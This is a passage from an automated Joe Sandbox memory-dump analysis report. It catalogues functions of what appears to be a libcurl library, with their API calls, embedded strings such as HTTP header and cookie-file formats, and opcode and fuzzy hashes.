                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a7067de7cc67af4c37c5f0866a28f1dd42a07a6606844d2c2c2d593bfc2b3d3e
                                                                                                                                            • Instruction ID: dcdfa123ed9355da1904838faed77f6e31cb633c6a2c85392bf891de86973af6
                                                                                                                                            • Opcode Fuzzy Hash: a7067de7cc67af4c37c5f0866a28f1dd42a07a6606844d2c2c2d593bfc2b3d3e
                                                                                                                                            • Instruction Fuzzy Hash: 5AC1D675A142099FDB05CFA9CA86BAF7BB5BF4A314F0040ADF41097341C778EA41CB62
                                                                                                                                            Function 6B77A760 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 367COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s, xrefs: 6B77A935
                                                                                                                                            • Can't get the size of file., xrefs: 6B77A9CE
                                                                                                                                            • Content-Length: %I64d, xrefs: 6B77A87D
                                                                                                                                            • failed to resume file:// transfer, xrefs: 6B77AC25
                                                                                                                                            • Accept-ranges: bytes, xrefs: 6B77A8AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                                            • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %I64d$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT%s$failed to resume file:// transfer
                                                                                                                                            • API String ID: 601868998-1509146019
                                                                                                                                            • Opcode ID: 7bbc948e70d3f7f20df3354b11b44bda40d315c1b8889a93f2a9e19af558f236
                                                                                                                                            • Instruction ID: 0f45a9cc64cca0b5c79d835ac1c4c44969f28afbb3869e1bcbfbacda23fd1ffb
                                                                                                                                            • Opcode Fuzzy Hash: 7bbc948e70d3f7f20df3354b11b44bda40d315c1b8889a93f2a9e19af558f236
                                                                                                                                            • Instruction Fuzzy Hash: BFD1B171E042189BEF209B74DE45BEEB7B6AF45308F0044F9F90DA7251EB399A848F51
                                                                                                                                            Function 6B77D3D0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 250COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • Request has same path as previous transfer, xrefs: 6B77D68E
                                                                                                                                            • Uploading to a URL without a file name!, xrefs: 6B77D5EB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___from_strstr_to_strchr_strncpy$_strrchr
                                                                                                                                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                                                                                                                            • API String ID: 2378022753-131330169
                                                                                                                                            • Opcode ID: e7b3e622aae76e5bce07140ad3cd9fe21bbc74d1272afc13997614563e9a6f94
                                                                                                                                            • Instruction ID: e057c8d7848389241259082027925f9649deae77935ba617d0d4756ae4eba817
                                                                                                                                            • Opcode Fuzzy Hash: e7b3e622aae76e5bce07140ad3cd9fe21bbc74d1272afc13997614563e9a6f94
                                                                                                                                            • Instruction Fuzzy Hash: 6091E9B0A44206ABDF24DF34DA45B9E7BB5EF02348F0441B8F81D9B241EB39E954CB94
                                                                                                                                            Function 6B776600 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 223COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_mfprintf.LIBCURL(?,%s,00000000), ref: 6B77679A
                                                                                                                                            Strings
                                                                                                                                            • ## Fatal libcurl error, xrefs: 6B7767F5
                                                                                                                                            • %s, xrefs: 6B776792
                                                                                                                                            • # Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk., xrefs: 6B776707
                                                                                                                                            • %s.%s.tmp, xrefs: 6B7766C1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mfprintf
                                                                                                                                            • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                                                                                                                            • API String ID: 8901498-4087121635
                                                                                                                                            • Opcode ID: 0a35b546f79f0b353e9c1a36a3e0ee8ec33a341a59f5eeebd497fb1d1635e79a
                                                                                                                                            • Instruction ID: 8c82f8567f2d91b391718706ec82485ca8f2754e4d9a62bf8f4d7a1d3e871c53
                                                                                                                                            • Opcode Fuzzy Hash: 0a35b546f79f0b353e9c1a36a3e0ee8ec33a341a59f5eeebd497fb1d1635e79a
                                                                                                                                            • Instruction Fuzzy Hash: 8061E5B1A042499BDF10AFB4AA967BF7B749F06348F0400B9FD05A7206DB2DDB0587A1
                                                                                                                                            Function 6B77EA30 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 155COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_mvsnprintf
                                                                                                                                            • String ID: %s%s%s$Couldn't set desired mode$Got a %03d response code instead of the assumed 200$LIST$NLST
                                                                                                                                            • API String ID: 3418963191-1262176364
                                                                                                                                            • Opcode ID: c7223775bd5376818bde9bef666f952483e175f1a3bddc2906e41eb50654af79
                                                                                                                                            • Instruction ID: a0df5d5f28b02ced3072980800a89919ac64dd3a1612dd60935e31e5bbb7a200
                                                                                                                                            • Opcode Fuzzy Hash: c7223775bd5376818bde9bef666f952483e175f1a3bddc2906e41eb50654af79
                                                                                                                                            • Instruction Fuzzy Hash: 71413B72B001186BEF206A78AD85FEE7BADDB457A9F0005B5FD09DB241E729DD0487E0
                                                                                                                                            Function 6B78D930 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B78D9E9
                                                                                                                                            • curl_maprintf.LIBCURL(%.*s,00000000,?,?,?,?,?,?,?,?,?,00000000,?,CONNECT,00000000,00000001), ref: 6B78D9FE
                                                                                                                                              • Part of subcall function 6B7948E0: curl_mvaprintf.LIBCURL(?,?,?,6B7766CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B7948EA
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Digest %s,Proxy-,?), ref: 6B78DA61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf$___from_strstr_to_strchrcurl_mvaprintf
                                                                                                                                            • String ID: %.*s$%sAuthorization: Digest %s$Digest$Proxy-
                                                                                                                                            • API String ID: 2694567262-3976116069
                                                                                                                                            • Opcode ID: eff8493abd213406885053fb21e4bfdc9e9abccaab66031ee8e2c3ec2be03769
                                                                                                                                            • Instruction ID: fd57944b005cd5d9e1e89684506f1b95d8338f5f3f249fc31c1f67bffc7cef6e
                                                                                                                                            • Opcode Fuzzy Hash: eff8493abd213406885053fb21e4bfdc9e9abccaab66031ee8e2c3ec2be03769
                                                                                                                                            • Instruction Fuzzy Hash: 77418071A04248AFDF01CFA8D985BAE7BE8EF45344F5040BAF808DB251E735DA508BA5
                                                                                                                                            Function 6B7928F0 Relevance: 12.2, APIs: 8, Instructions: 199COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_mime_data.LIBCURL(?,?,?), ref: 6B792917
                                                                                                                                            • curl_mime_filedata.LIBCURL(?,?), ref: 6B79292A
                                                                                                                                            • curl_mime_data_cb.LIBCURL(?,?,?,?,?,?,?), ref: 6B792955
                                                                                                                                            • curl_mime_init.LIBCURL ref: 6B792963
                                                                                                                                            • curl_mime_subparts.LIBCURL(?,00000000), ref: 6B792976
                                                                                                                                            • curl_mime_addpart.LIBCURL(00000000), ref: 6B79299D
                                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?), ref: 6B792A1B
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?), ref: 6B792A44
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_slist_free_all$curl_mime_addpartcurl_mime_datacurl_mime_data_cbcurl_mime_filedatacurl_mime_initcurl_mime_subparts
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3177825088-0
                                                                                                                                            • Opcode ID: 199250ca454a9da4a7a3a2d9bc5b6e31c073c9a38ef7678ea5764421eed66138
                                                                                                                                            • Instruction ID: 0f711b754132925c783b8e3f9cbcb45ed94b1550ea90c82e6be7aedb9ebab2a5
                                                                                                                                            • Opcode Fuzzy Hash: 199250ca454a9da4a7a3a2d9bc5b6e31c073c9a38ef7678ea5764421eed66138
                                                                                                                                            • Instruction Fuzzy Hash: A351E3B2A04515ABDF14BF28FA8659E7764FF05324B0401B9FD09AB701E73AE9209BD1
                                                                                                                                            Function 6B78DC80 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 249COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Negotiate %s,Proxy-,00000000,?,?,00000000,?), ref: 6B78DF14
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$HTTP$Negotiate auth restarted$Proxy-
                                                                                                                                            • API String ID: 3307269620-819322280
                                                                                                                                            • Opcode ID: 3685a4b0da620dd41c01b1bbcbf88267bda047b87f3596255ef73fec01b5f333
                                                                                                                                            • Instruction ID: e4b50baec223738d885c819fd5a1457a9e76c46955c8694da09f572644cf6831
                                                                                                                                            • Opcode Fuzzy Hash: 3685a4b0da620dd41c01b1bbcbf88267bda047b87f3596255ef73fec01b5f333
                                                                                                                                            • Instruction Fuzzy Hash: A891E171A042089FEB11CF68D984BDEBBF5EF45354F0444BEE858E7200D77AAA14CBA5
                                                                                                                                            Function 6B7CF88C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 0-537541572
                                                                                                                                            • Opcode ID: 34e9cc2c502b863053a0e274f8a933e2dd1f319ad4b9f9b02db2eb46a684896f
                                                                                                                                            • Instruction ID: ddc7413f15a11a13d2df6e89effbcea2b54d58ca4f84740ae44424ec9806613e
                                                                                                                                            • Opcode Fuzzy Hash: 34e9cc2c502b863053a0e274f8a933e2dd1f319ad4b9f9b02db2eb46a684896f
                                                                                                                                            • Instruction Fuzzy Hash: E021A132D45625BFDF114A248E54B0F37A89F42BB0F110178FD65EF281D738E90985E6
                                                                                                                                            Function 6B7D5EEE Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7D5EB6: _free.LIBCMT ref: 6B7D5EDB
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F3C
                                                                                                                                              • Part of subcall function 6B7CF7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0), ref: 6B7CF800
                                                                                                                                              • Part of subcall function 6B7CF7EA: GetLastError.KERNEL32(6B7F38A0,?,6B7D5EE0,6B7F38A0,00000000,6B7F38A0,00000000,?,6B7D5F07,6B7F38A0,00000007,6B7F38A0,?,6B7D532A,6B7F38A0,6B7F38A0), ref: 6B7CF812
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F47
                                                                                                                                            • _free.LIBCMT ref: 6B7D5F52
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FA6
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FB1
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FBC
                                                                                                                                            • _free.LIBCMT ref: 6B7D5FC7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                                            • Instruction ID: 5630d61a964aeba693dedb7a04af5596ffb1cfcb3dd6544ad21a40cf80970a88
                                                                                                                                            • Opcode Fuzzy Hash: a2040689eb20bcf9bb80bc7575afd7fe6432a9a444dbacbf3969c66c2c91fe63
                                                                                                                                            • Instruction Fuzzy Hash: 7E112C71941B04EFEB20FBB0DE4AFCB7B9DBF01745F800A1DB2AA6A050DB79A5044651
                                                                                                                                            Function 6B776AC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • curl_maprintf.LIBCURL(%s%s%s%s%s%s%I64d%s%s,#HttpOnly_,6B7DB98E,unknown,6B7DB988,6B7DB868,6B7DB988,100C15FF,5D8B6B7F,74DB8504,6B7DB98E,00000000,00000000,00000000), ref: 6B776B55
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_maprintf
                                                                                                                                            • String ID: #HttpOnly_$%s%s%s%s%s%s%I64d%s%s$FALSE$TRUE$unknown
                                                                                                                                            • API String ID: 3307269620-3622669638
                                                                                                                                            • Opcode ID: b3ed832691d58c62281f61c05cc4d95d5a4990bf0de9aae64b56a97029727f46
                                                                                                                                            • Instruction ID: 0e68effa8791ac641933f2c2c871e64f87cb60cd7455ef5cd75d68a2b1a45223
                                                                                                                                            • Opcode Fuzzy Hash: b3ed832691d58c62281f61c05cc4d95d5a4990bf0de9aae64b56a97029727f46
                                                                                                                                            • Instruction Fuzzy Hash: 1411B6B4700189EFDB189A25DE45B56FBE9AF492D0F4045A8FC08DB312D225FD80C7A1
                                                                                                                                            Function 6B7CE4BC Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleCP.KERNEL32(6B7C92EA,00000000,?), ref: 6B7CE504
                                                                                                                                            • __fassign.LIBCMT ref: 6B7CE6E3
                                                                                                                                            • __fassign.LIBCMT ref: 6B7CE700
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B7CE748
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6B7CE788
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B7CE834
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4031098158-0
                                                                                                                                            • Opcode ID: c817ee0bbf0c2d108108154cd5bbd309e1b48f61792c786fdf4fc3215f7fa83a
                                                                                                                                            • Instruction ID: 597a82bf06becf80718e4c785aeaa3ecc50a2feaf31f2a86b787d50370753032
                                                                                                                                            • Opcode Fuzzy Hash: c817ee0bbf0c2d108108154cd5bbd309e1b48f61792c786fdf4fc3215f7fa83a
                                                                                                                                            • Instruction Fuzzy Hash: A7D1A975D0025C9FCF15CFA8CA819EEBBB5BF49304F24006EE865BB241E734AA46CB55
                                                                                                                                            Function 6B79D1F0 Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D266
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D27A
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D2CC
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D2F9
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D362
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B79D4C1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 885266447-0
                                                                                                                                            • Opcode ID: 226e0473ff07bf44d4cb59f64c8d260c8a793a4a782744461131d68dc1ad9296
                                                                                                                                            • Instruction ID: 005503506ce25a2d4687c57f4159f081231eb9e1c35230017c3dbf1507e31013
                                                                                                                                            • Opcode Fuzzy Hash: 226e0473ff07bf44d4cb59f64c8d260c8a793a4a782744461131d68dc1ad9296
                                                                                                                                            • Instruction Fuzzy Hash: 7AA1D474E402049BDB10DF68EA85BAE7BB5EF85318F1446B9FC1C9F345DB34A9408BA4
                                                                                                                                            Function 6B7B4F30 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000004,?,?), ref: 6B7B500B
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000001,00000004,?,?), ref: 6B7B5012
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B501F
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B5026
                                                                                                                                            • VerSetConditionMask.KERNEL32(00000000,?,00000008,00000001,?,00000010,00000005,?,00000020,00000005,?,00000001,00000004,?,?), ref: 6B7B5032
                                                                                                                                            • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000), ref: 6B7B503F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                            • Opcode ID: 910598134063748c9899b15d5073a82212ff7913e3de8a886cc1ef9f9170ff69
                                                                                                                                            • Instruction ID: da1fb68f6cd80b2794aa05c6762da948afe5b5f94c240174bf046afeb22511ad
                                                                                                                                            • Opcode Fuzzy Hash: 910598134063748c9899b15d5073a82212ff7913e3de8a886cc1ef9f9170ff69
                                                                                                                                            • Instruction Fuzzy Hash: 9A316270B44358AEEF20CF688D49F9F7BF8AB46744F0400D9B54C67281C6759E848F66
                                                                                                                                            Function 6B7B6410 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 343COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • htonl.WS2_32(?), ref: 6B7B65CA
